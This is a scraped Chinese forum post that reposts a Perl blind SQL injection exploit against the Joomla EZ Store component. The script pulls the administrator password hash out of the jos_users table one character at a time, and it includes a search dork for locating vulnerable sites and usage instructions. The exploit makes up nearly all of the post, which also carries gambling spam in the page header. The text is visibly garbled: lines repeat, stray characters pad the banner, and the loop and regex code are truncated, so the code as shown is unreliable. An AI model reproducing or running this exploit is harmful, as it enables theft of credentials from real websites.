Joomla Component EZ Store Remote Blind SQL Injection Exploit - Exploit - 脚本交流论坛 软件下载网|软件下载论坛|软体下载|软件分享 - Powered by Discuz! 亚博世界杯app,亚博网上投注,yabo体育网
发新话题
打印

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

#!/usr/bin/perl


#Note:Sometimes you have to change the regexp to??viewcategory/catid,".$cid."


use LWP::UserAgent;


use Getopt:ong;

if(!$ARGV[1])


{


??print "





#!/usr/bin/perl


#Note:Sometimes you have to change the regexp to??viewcategory/catid,".$cid."


use LWP::UserAgent;


use Getopt:ong;

if(!$ARGV[1])


{


??print "? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?\n";


? ? print "? ?################################################################\n";


??print "? ?#? ?Joomla Component EZ Store Blind SQL Injection Exploit? ?? ?#\n";


??print "? ?#? ?Author:His0k4 [ALGERIAN HaCkeR]? ?? ?? ?? ?? ?? ?? ?? ?? ? #\n";


??print "? ?#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#\n";


??print "? ?#? ?Conctact: His0k4.hlm[at]gamil.com? ?? ?? ?? ?? ?? ?? ?? ???#\n";


??print "? ?#? ?Greetz:? ?All friends & muslims HacKeRs? ?? ?? ?? ?? ?? ???#\n";


??print "? ?#? ?Greetz2:??http://www.dz-secure.com? ?? ?? ?? ?? ?? ?? ?? ? #\n";


??print "? ?#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#\n";


??print "? ?#? ?Dork:? ? inurl:com_ezstore? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#\n";


??print "? ?#? ?Usage:? ?perl ezstore.pl host path? ?? ?? ?? ?? ? #\n";


??print "? ?#? ?Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2??#\n";


??print "? ?#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#\n";


??print "? ?#? ?Options:? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#\n";


??print "? ?#? ???-t? ? Valid??procuct id? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #\n";


??print "? ?#? ???-c? ? Category value of the following??product id? ?? ???#\n";


??print "? ?################################################################\n";

??exit;


}

my $host? ? = $ARGV[0];


my $path? ? = $ARGV[1];


my $cid? ???= $ARGV[2];


my $pid? ???= $ARGV[3];

my %options = ();


GetOptions(\%options, "c=i", "x=s", "p=i");

print "["] Exploiting...\n";

if($options{"c"})


{


??$cid = $options{"c"};


}

if($options{"p"})


{


??$pid = $options{"p"};


}

syswrite(STDOUT, "["] MD5-Hash: ", 14);

for(my $i = 1; $i new;


??my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

??if($options{"x"})


??{


? ? $ua->proxy('http', "http://".$options{"x"});


??}

??my $resp = $ua->get($query);


??my $content = $resp->content;


??my $regexp = "viewcategory&catid=".$cid."";

??if($content =" /$regexp/)


??{


? ? return 1;


??}


??else


??{


? ? return 0;


??}

}

TOP

发新话题
最近访问的版块